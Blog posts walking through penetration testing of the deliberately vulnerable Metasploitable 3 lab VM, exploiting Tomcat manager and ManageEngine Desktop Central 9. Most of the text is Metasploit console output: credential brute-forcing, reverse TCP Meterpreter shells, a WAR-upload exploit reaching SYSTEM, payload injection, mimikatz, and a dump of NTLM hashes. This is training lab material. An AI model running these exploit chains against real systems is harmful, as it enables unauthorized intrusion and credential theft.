The Internet of Stuff and Things: tomcat

Showing posts with label tomcat. Show all posts

Saturday, January 21, 2017

Metasploitable 3 - Exploiting Tomcat

Metasploitable 3

Exploiting Tomcat

If you remember, this are the services that NMAP found running on metasploitable 3, on TCP port 8282 there's a Apache Tomcat server running and that's the one I'll exploit for this post.

Services
========

host port proto name state info
---- ---- ----- ---- ----- ----
10.20.10.23 21 tcp ftp open Microsoft ftpd
10.20.10.23 22 tcp ssh open OpenSSH 7.1 protocol 2.0
10.20.10.23 80 tcp http open Microsoft-IIS/7.5 ( Powered by ASP.NET )
10.20.10.23 161 udp snmp open SNMPv1 server public
10.20.10.23 445 tcp smb open
10.20.10.23 1617 tcp nimrod-agent open
10.20.10.23 3000 tcp http open WEBrick/1.3.1 (Ruby/2.3.1/2016-04-26)
10.20.10.23 4848 tcp https open Oracle GlassFish 4.0 Servlet 3.1; JSP 2.3; Java 1.8
10.20.10.23 5985 tcp http open Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
10.20.10.23 5986 tcp http open
10.20.10.23 8020 tcp http open Apache httpd
10.20.10.23 8022 tcp http open Apache Tomcat/Coyote JSP engine 1.1
10.20.10.23 8027 tcp open
10.20.10.23 8080 tcp http open Oracle GlassFish 4.0 Servlet 3.1; JSP 2.3; Java 1.8
10.20.10.23 8282 tcp http open Apache-Coyote/1.1
10.20.10.23 8383 tcp https open Apache httpd
10.20.10.23 8484 tcp http open Jetty winstone-2.8
10.20.10.23 8585 tcp http open Apache/2.2.21 (Win64) PHP/5.3.10 DAV/2 ( Powered by PHP/5.3.10 )
10.20.10.23 9200 tcp http open Elasticsearch REST API 1.1.1 name: Mammomax; Lucene 4.7
10.20.10.23 9800 tcp http open
10.20.10.23 49153 tcp msrpc open Microsoft Windows RPC
10.20.10.23 49154 tcp msrpc open Microsoft Windows RPC
10.20.10.23 49263 tcp open
10.20.10.23 49264 tcp tcpwrapped open

When I use my browser I can confirm it's a Apache Tomcat and it's showing the default web site with a link to the manager webapp.

Apache Tomcat's default web site with manager webapp link

Clicking on the link shows me a dialog box requesting Authentication.

Authentication Request for /manager/html

After failing several combinations of usernames and passwords to login, I clicked on the Cancel button and find a 401 Unauthorized message disclosing information about where to find credentials for the web manager app.

Authentication fails with a 401 message and Disclosure of Information

It seems the credentials can be found in a conf/tomcat-users.xml file somewhere in the file system.

First, let's try a simple brutforce using metasploit to see if we can guess the username and password from the built-in word lists.

msf > info auxiliary/scanner/http/tomcat_mgr_login

Name: Tomcat Application Manager Login Utility
Module: auxiliary/scanner/http/tomcat_mgr_login
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
MC <mc@metasploit.com>
Matteo Cantoni <goony@nothink.org>
jduck <jduck@metasploit.com>

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no The HTTP password to specify for authentication
PASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 8080 yes The target port
SSL false no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TARGETURI /manager/html yes URI for Manager login. Default is /manager/html
THREADS 1 yes The number of concurrent threads
USERNAME no The HTTP username to specify for authentication
USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host

Description:
This module simply attempts to login to a Tomcat Application Manager
instance using a specific user/pass.

References:
https://cvedetails.com/cve/CVE-2009-3843/
OSVDB (60317)
http://www.securityfocus.com/bid/37086
https://cvedetails.com/cve/CVE-2009-4189/
OSVDB (60670)
http://www.harmonysecurity.com/blog/2009/11/hp-operations-manager-backdoor-account.html
http://www.zerodayinitiative.com/advisories/ZDI-09-085
https://cvedetails.com/cve/CVE-2009-4188/
http://www.securityfocus.com/bid/38084
https://cvedetails.com/cve/CVE-2010-0557/
http://www-01.ibm.com/support/docview.wss?uid=swg21419179
https://cvedetails.com/cve/CVE-2010-4094/
http://www.zerodayinitiative.com/advisories/ZDI-10-214
https://cvedetails.com/cve/CVE-2009-3548/
OSVDB (60176)
http://www.securityfocus.com/bid/36954
http://tomcat.apache.org/
https://cvedetails.com/cve/CVE-1999-0502/

I setup my RHOST and RPORT, and run the module

msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set RHOSTS 10.20.10.23
RHOSTS => 10.20.10.23
msf auxiliary(tomcat_mgr_login) > set RPORT 8282
RPORT => 8282
msf auxiliary(tomcat_mgr_login) > run

[-] 10.20.10.23:8282 - LOGIN FAILED: admin:admin (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: admin:manager (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: admin:role1 (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: admin:root (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: admin:tomcat (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: admin:s3cret (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: admin:vagrant (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: manager:admin (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: manager:manager (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: manager:role1 (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: manager:root (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: manager:tomcat (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: manager:s3cret (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: manager:vagrant (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: role1:admin (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: role1:manager (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: role1:root (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: role1:tomcat (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: role1:s3cret (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: role1:vagrant (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: root:admin (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: root:manager (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: root:role1 (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: root:root (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: root:tomcat (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: root:s3cret (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: root:vagrant (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: tomcat:admin (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: tomcat:manager (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: tomcat:role1 (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: tomcat:root (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: tomcat:tomcat (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: tomcat:s3cret (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: tomcat:vagrant (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: both:admin (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: both:manager (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: both:role1 (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: both:root (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: both:tomcat (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: both:s3cret (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: both:vagrant (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: j2deployer:j2deployer (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: cxsdk:kdsxc (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: root:owaspbwa (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: ADMIN:ADMIN (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: xampp:xampp (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: tomcat:s3cret (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: QCC:QLogic66 (Incorrect)
[-] 10.20.10.23:8282 - LOGIN FAILED: admin:vagrant (Incorrect)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tomcat_mgr_login) >

NO LUCK! 👎

OK, plan B... we use the disclosed information from the 401 Unauthorized access web page, it says there's a conf/tomcat-users.xml somewhere, so we use an older exploit to go look for it.

msf exploit(manageengine_connectionid_write) > run

[*] Started reverse TCP handler on 10.23.10.200:4444
[*] Creating JSP stager
[*] Uploading JSP stager Oynza.jsp...
[*] Executing stager...
[*] Sending stage (957487 bytes) to 10.20.10.23
[*] Meterpreter session 3 opened (10.23.10.200:4444 -> 10.20.10.23:50324) at 2017-01-20 22:26:44 -0500
[+] Deleted ../webapps/DesktopCentral/jspf/Oynza.jsp

meterpreter > info
Usage: info <module>

Prints information about a post-exploitation module

meterpreter > sysinfo
Computer : METASPLOITABLE3
OS : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >

meterpreter > getuid
Server username: NT AUTHORITY\LOCAL SERVICE
meterpreter > pwd
C:\ManageEngine\DesktopCentral_Server\bin
meterpreter > cd /
meterpreter > pwd
C:\
meterpreter > search -f tomcat-users.xml
Found 3 results...
c:\ManageEngine\DesktopCentral_Server\conf\tomcat-users.xml (70 bytes)
c:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33\conf\tomcat-users.xml (2309 bytes)
c:\vagrant\resources\apache_struts\tomcat-users.xml (2309 bytes)

meterpreter > cat /Program\ Files/Apache\ Software\ Foundation/tomcat/apache-tomcat-8.0.33/conf/tomcat-users.xml
<?xml version='1.0' encoding='utf-8'?>
...


<role rolename="manager-gui"/>
<user username="sploit" password="sploit" roles="manager-gui"/>

</tomcat-users>

Just like the 401 Page said, there's a manager gui role setup with a username and password in clear text, sploit/sploit
Now I have a gui managers credentials and can try to get a meterpreter with another exploit.
msf auxiliary(tomcat_mgr_login) > info exploit/multi/http/tomcat_mgr_upload

Name: Apache Tomcat Manager Authenticated Upload Code Execution
Module: exploit/multi/http/tomcat_mgr_upload
Platform: Java, Linux, Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2009-11-09

Provided by:
rangercha

Available targets:
Id Name
-- ----
0 Automatic
1 Java Universal
2 Windows Universal
3 Linux x86

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword no The password for the specified username
HttpUsername no The username to authenticate as
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 10.20.10.23 yes The target address
RPORT 80 yes The target port
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /manager yes The URI path of the manager app (/html/upload and /undeploy will be used)
VHOST no HTTP server virtual host

Payload information:

Description:
This module can be used to execute a payload on Apache Tomcat
servers that have an exposed "manager" application. The payload is
uploaded as a WAR archive containing a jsp application using a POST
request against the /manager/html/upload component. NOTE: The
compatible payload sets vary based on the selected target. For
example, you must select the Windows target to use native Windows
payloads.

References:
https://cvedetails.com/cve/CVE-2009-3843/
OSVDB (60317)
https://cvedetails.com/cve/CVE-2009-4189/
OSVDB (60670)
https://cvedetails.com/cve/CVE-2009-4188/
http://www.securityfocus.com/bid/38084
https://cvedetails.com/cve/CVE-2010-0557/
http://www-01.ibm.com/support/docview.wss?uid=swg21419179
https://cvedetails.com/cve/CVE-2010-4094/
http://www.zerodayinitiative.com/advisories/ZDI-10-214
https://cvedetails.com/cve/CVE-2009-3548/
OSVDB (60176)
http://www.securityfocus.com/bid/36954
http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html

msf auxiliary(tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_upload

Setup username and password found in the tomcat-users.xml

msf exploit(tomcat_mgr_upload) > set HttpPassword sploit
HttpPassword => sploit
msf exploit(tomcat_mgr_upload) > set HttpUsername sploit
HttpUsername => sploit

Setup metasploitable 3 IP address and Tomcat TCP Port
msf exploit(tomcat_mgr_upload) > set RHOST 10.20.10.23
RHOST => 10.20.10.23

msf exploit(tomcat_mgr_upload) > set RPORT 8282

And exploit!
msf exploit(tomcat_mgr_upload) > run

[*] Started reverse TCP handler on 10.23.10.200:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying 4MLnXRl...
[*] Executing 4MLnXRl...
[*] Sending stage (957487 bytes) to 10.20.10.23
[*] Undeploying 4MLnXRl ...
[*] Meterpreter session 4 opened (10.23.10.200:4444 -> 10.20.10.23:50340) at 2017-01-20 23:17:06 -0500

meterpreter > sysinfo
Computer : METASPLOITABLE3
OS : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter >

Great!, I have a 32bit meterpreter with SYSTEM privileges

Let's get a 64bit meterpreter so I can run other tools like mimikats fully.

I send the meterpreter session to the background so I can use it to inject a second payload

meterpreter > background

[*] Backgrounding session 4...

I used a payload_inject exploit for Windows and set the payload to a reverse TCP 64 bit meterprter

msf exploit(tomcat_mgr_upload) > use exploit/windows/local/payload_inject

msf exploit(payload_inject) > info exploit/windows/local/payload_inject

Name: Windows Manage Memory Payload Injection

Module: exploit/windows/local/payload_inject

Platform: Windows

Privileged: No

License: Metasploit Framework License (BSD)

Rank: Excellent

Disclosed: 2011-10-12

Provided by:

Carlos Perez <carlos_perez@darkoperator.com>

sinn3r <sinn3r@metasploit.com>

Available targets:

Id Name

-- ----

0 Windows

Basic options:

Name Current Setting Required Description

---- --------------- -------- -----------

NEWPROCESS false no New notepad.exe to inject to

PID no Process Identifier to inject of process to inject payload.

SESSION yes The session to run this module on.

Payload information:

Space: 4096

Description:

This module will inject a payload into memory of a process. If a

payload isn't selected, then it'll default to a reverse x86 TCP

meterpreter. If the PID datastore option isn't specified, then it'll inject into notepad.exe instead.

msf exploit(payload_inject) > options

Module options (exploit/windows/local/payload_inject):

Name Current Setting Required Description

---- --------------- -------- -----------

NEWPROCESS false no New notepad.exe to inject to

PID no Process Identifier to inject of process to inject payload.

SESSION yes The session to run this module on.

Exploit target:

Id Name

-- ----

0 Windows

msf exploit(payload_inject) > set payload windows/x64/meterpreter/reverse_tcp

payload => windows/x64/meterpreter/reverse_tcp

msf exploit(payload_inject) > options

Module options (exploit/windows/local/payload_inject):

Name Current Setting Required Description

---- --------------- -------- -----------

NEWPROCESS false no New notepad.exe to inject to

PID no Process Identifier to inject of process to inject payload.

SESSION yes The session to run this module on.

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)

LHOST yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Windows

Set my local port and local IP address to be used for a listener for the second meterpreter

msf exploit(payload_inject) > set LPORT 4467

LPORT => 4467

msf exploit(payload_inject) > set LHOST 10.23.10.200

LHOST => 10.23.10.200

msf exploit(payload_inject) > sessions

Active sessions

===============

Id Type Information Connection

-- ---- ----------- ----------

4 meterpreter x86/windows NT AUTHORITY\SYSTEM @ METASPLOITABLE3 10.23.10.200:4444 -> 10.20.10.23:50340 (10.20.10.23)

I tell the exploit to use my background 32bit session for the injection

msf exploit(payload_inject) > set session 4

session => 4

msf exploit(payload_inject) > run

[*] Started reverse TCP handler on 10.23.10.200:4467

[*] Running module against METASPLOITABLE3

[-] PID does not actually exist.

[*] Launching notepad.exe...

[*] Preparing 'windows/x64/meterpreter/reverse_tcp' for PID 6068

[*] Sending stage (1189423 bytes) to 10.20.10.23

[*] Meterpreter session 5 opened (10.23.10.200:4467 -> 10.20.10.23:50345) at 2017-01-20 23:30:34 -0500

meterpreter > sysinfo

Computer : METASPLOITABLE3

OS : Windows 2008 R2 (Build 7601, Service Pack 1).

Architecture : x64

System Language : en_US

Domain : WORKGROUP

Logged On Users : 2

Meterpreter : x64/windows 👍

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > load mimikatz

Loading extension mimikatz...success.

meterpreter > mimikatz... TO BE CONTINUED ... 😁

Also the tomcat credentials have been added to my creds table automatically in case I need them again

Credentials

===========

host origin service public private realm private_type

---- ------ ------- ------ ------- ----- ------------

10.20.10.23 10.20.10.23 8022/tcp (http) admin admin Password

10.20.10.23 10.20.10.23 445/tcp (smb) administrator aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) guest aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) vagrant aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) sshd aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) sshd_server aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035 NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) leah_organa aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028 NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) luke_skywalker aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) han_solo aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951 NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) artoo_detoo aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4 NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) c_three_pio aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) ben_kenobi aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859 NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) darth_vader aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0 NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) anakin_skywalker aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) jarjar_binks aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4 NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) lando_calrissian aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) boba_fett aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9 NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) jabba_hutt aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76 NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) greedo aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) chewbacca aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8 NTLM hash

10.20.10.23 10.20.10.23 445/tcp (smb) kylo_ren aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001 NTLM hash

10.20.10.23 445/tcp (smb) c_three_pio pr0t0c0l:12 Password

10.20.10.23 445/tcp (smb) vagrant vagrant:5 Password

10.20.10.23 445/tcp (smb) administrator vagrant:3 Password

10.20.10.23 10.20.10.23 8282/tcp (http) sploit sploit Password

BTW, I manged to crack a couple of more passwords, I'll show later. I really want to keep playing with JtR to get them all.

Wednesday, January 11, 2017

Metasploitable 3 - ManageEngine DesktopCentral 9

Metasploitable 3
Remote Code Execution on ManageEngine DesktopCentral 9

If you remember, we found a Apache Tomcat running on TCP port 8022

msf > services

Services
========

host port proto name state info
---- ---- ----- ---- ----- ----
10.20.10.23 21 tcp ftp open Microsoft ftpd
10.20.10.23 22 tcp ssh open OpenSSH 7.1 protocol 2.0
10.20.10.23 80 tcp http open Microsoft IIS httpd 7.5

10.20.10.23 161 udp snmp open SNMPv1 server public
10.20.10.23 1617 tcp nimrod-agent open
10.20.10.23 3000 tcp http open WEBrick httpd 1.3.1 Ruby 2.3.1 (2016-04-26)
10.20.10.23 4848 tcp ssl/http open Oracle GlassFish 4.0 Servlet 3.1; JSP 2.3; Java 1.8
10.20.10.23 5985 tcp http open Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
10.20.10.23 8020 tcp http open Apache httpd
10.20.10.23 8022 tcp http open Apache Tomcat/Coyote JSP engine 1.1
10.20.10.23 8027 tcp open
10.20.10.23 8080 tcp http open Oracle GlassFish 4.0 Servlet 3.1; JSP 2.3; Java 1.8
10.20.10.23 8282 tcp http open Apache-Coyote/1.1 ( 401-Basic realm="Tomcat Manager Application" )
10.20.10.23 8383 tcp ssl/http open Apache httpd
10.20.10.23 8484 tcp http open Jetty winstone-2.8
10.20.10.23 8585 tcp http open Apache httpd 2.2.21 (Win64) PHP/5.3.10 DAV/2
10.20.10.23 9200 tcp http open Elasticsearch REST API 1.1.1 name: Mammomax; Lucene 4.7
10.20.10.23 49153 tcp msrpc open Microsoft Windows RPC
10.20.10.23 49154 tcp msrpc open Microsoft Windows RPC
10.20.10.23 49263 tcp open
10.20.10.23 49264 tcp tcpwrapped open

So I decided to investigate by opening a browser to see what application was running on tomcat

Desktop Central 9

I found a ManageEngine - Desktop Central 9 login, with what looks like default credentials autocompleted.

Doing some research I found out that this wonderful Java App is very useful, it helps companies with

Patch Managment
Software Deployment
Remote Control
Asset Management
Service Pack Installation
User Administration
etc, etc, etc

There's even a Mobile App to do all that stuff on the go! Cool stuff!!

Going back to the default credentials, it seems that password is also 'admin', I could confirm it in the Web Interface, but I decided to use metasploit since this is Metasploitable anyway, right? :)

First, we look for what's available against ManageEngine products

msf > search manageengine

Matching Modules

================

Name Disclosure Date Rank Description

---- --------------- ---- -----------

auxiliary/admin/http/manage_engine_dc_create_admin 2014-12-31 normal ManageEngine Desktop Central Administrator Account Creation

auxiliary/admin/http/manageengine_dir_listing 2015-01-28 normal ManageEngine Multiple Products Arbitrary Directory Listing

auxiliary/admin/http/manageengine_file_download 2015-01-28 normal ManageEngine Multiple Products Arbitrary File Download

auxiliary/admin/http/manageengine_pmp_privesc 2014-11-08 normal ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection

auxiliary/admin/http/netflow_file_download 2014-11-30 normal ManageEngine NetFlow Analyzer Arbitrary File Download

auxiliary/gather/eventlog_cred_disclosure 2014-11-05 normal ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure

auxiliary/scanner/http/manageengine_desktop_central_login normal ManageEngine Desktop Central Login Utility

auxiliary/scanner/http/manageengine_deviceexpert_traversal 2012-03-18 normal ManageEngine DeviceExpert 5.6 ScheduleResultViewer FileName Traversal

auxiliary/scanner/http/manageengine_deviceexpert_user_creds 2014-08-28 normal ManageEngine DeviceExpert User Credentials

auxiliary/scanner/http/manageengine_securitymanager_traversal 2012-10-19 normal ManageEngine SecurityManager Plus 5.5 Directory Traversal

auxiliary/scanner/http/servicedesk_plus_traversal 2015-10-03 normal ManageEngine ServiceDesk Plus Path Traversal

auxiliary/scanner/http/support_center_plus_directory_traversal 2014-01-28 normal ManageEngine Support Center Plus Directory Traversal

exploit/multi/http/eventlog_file_upload 2014-08-31 excellent ManageEngine Eventlog Analyzer Arbitrary File Upload

exploit/multi/http/manage_engine_dc_pmp_sqli 2014-06-08 excellent ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection

exploit/multi/http/manageengine_auth_upload 2014-12-15 excellent ManageEngine Multiple Products Authenticated File Upload

exploit/multi/http/manageengine_sd_uploader 2015-08-20 excellent ManageEngine ServiceDesk Plus Arbitrary File Upload

exploit/multi/http/manageengine_search_sqli 2012-10-18 excellent ManageEngine Security Manager Plus 5.5 Build 5505 SQL Injection

exploit/multi/http/opmanager_socialit_file_upload 2014-09-27 excellent ManageEngine OpManager and Social IT Arbitrary File Upload

exploit/windows/http/desktopcentral_file_upload 2013-11-11 excellent ManageEngine Desktop Central AgentLogUpload Arbitrary File Upload

exploit/windows/http/desktopcentral_statusupdate_upload 2014-08-31 excellent ManageEngine Desktop Central StatusUpdate Arbitrary File Upload

exploit/windows/http/manage_engine_opmanager_rce 2015-09-14 manual ManageEngine OpManager Remote Code Execution

exploit/windows/http/manageengine_apps_mngr 2011-04-08 average ManageEngine Applications Manager Authenticated Code Execution

exploit/windows/http/manageengine_connectionid_write 2015-12-14 excellent ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability

exploit/windows/misc/manageengine_eventlog_analyzer_rce 2015-07-11 manual ManageEngine EventLog Analyzer Remote Code Execution

A lot of good stuff.

Ok let's use the auxiliary/scanner/http/manageengine_desktop_central_login to make sure our admin/admin creds work

msf > use auxiliary/scanner/http/manageengine_desktop_central_login

msf auxiliary(manageengine_desktop_central_login) > options

Module options (auxiliary/scanner/http/manageengine_desktop_central_login):

Name Current Setting Required Description

---- --------------- -------- -----------

BLANK_PASSWORDS false no Try blank passwords for all users

BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5

DB_ALL_CREDS false no Try each user/password couple stored in the current database

DB_ALL_PASS false no Add all passwords in the current database to the list

DB_ALL_USERS false no Add all users in the current database to the list

PASSWORD no A specific password to authenticate with

PASS_FILE no File containing passwords, one per line

Proxies no A proxy chain of format type:host:port[,type:host:port][...]

RHOSTS yes The target address range or CIDR identifier

RPORT 8020 yes The target port

SSL false no Negotiate SSL/TLS for outgoing connections

STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host

THREADS 1 yes The number of concurrent threads

USERNAME no A specific username to authenticate as

USERPASS_FILE no File containing users and passwords separated by space, one pair per line

USER_AS_PASS false no Try the username as the password for all users

USER_FILE no File containing usernames, one per line

VERBOSE true yes Whether to print output for all attempts

VHOST no HTTP server virtual host

I set the USERNAME option to admin and the USER_AS_PASS to true so it tries the same username as the password.

msf auxiliary(manageengine_desktop_central_login) > set USER_AS_PASS true

USER_AS_PASS => true

msf auxiliary(manageengine_desktop_central_login) > set USERNAME admin

USERNAME => admin

msf auxiliary(manageengine_desktop_central_login) > options

Module options (auxiliary/scanner/http/manageengine_desktop_central_login):

Name Current Setting Required Description

---- --------------- -------- -----------

BLANK_PASSWORDS false no Try blank passwords for all users

BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5

DB_ALL_CREDS false no Try each user/password couple stored in the current database

DB_ALL_PASS false no Add all passwords in the current database to the list

DB_ALL_USERS false no Add all users in the current database to the list

PASSWORD no A specific password to authenticate with

PASS_FILE no File containing passwords, one per line

Proxies no A proxy chain of format type:host:port[,type:host:port][...]

RHOSTS yes The target address range or CIDR identifier

RPORT 8020 yes The target port

SSL false no Negotiate SSL/TLS for outgoing connections

STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host

THREADS 1 yes The number of concurrent threads

USERNAME admin no A specific username to authenticate as

USERPASS_FILE no File containing users and passwords separated by space, one pair per line

USER_AS_PASS true no Try the username as the password for all users

USER_FILE no File containing usernames, one per line

VERBOSE true yes Whether to print output for all attempts

VHOST no HTTP server virtual host

I set the RHOSTS to the IP address of my Metasploitable 3 server, and RPORT to the TCP port reported by nmap and stored in my metasploite db

msf auxiliary(manageengine_desktop_central_login) > set RHOSTS 10.20.10.23

RHOSTS => 10.20.10.23

msf auxiliary(manageengine_desktop_central_login) > set RPORT 8022

RPORT => 8022

msf auxiliary(manageengine_desktop_central_login) > run

[+] MANAGEENGINE_DESKTOP_CENTRAL - Success: 'admin:admin'

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

Confirmed! admin/admin is a valid credential and is now saved in my workspace in case I need it.

msf auxiliary(manageengine_desktop_central_login) > creds

Credentials

===========

host origin service public private realm private_type

---- ------ ------- ------ ------- ----- ------------

10.20.10.23 10.20.10.23 8022/tcp (http) admin admin Password

Now let's try exploiting one of those. I chose the Desktop Central 9 FileUploadServlet ConnectionId Vulnerability:

CVE-2015-8249

msf auxiliary(manageengine_desktop_central_login) > use exploit/windows/http/manageengine_connectionid_write

msf exploit(manageengine_connectionid_write) > options

Module options (exploit/windows/http/manageengine_connectionid_write):

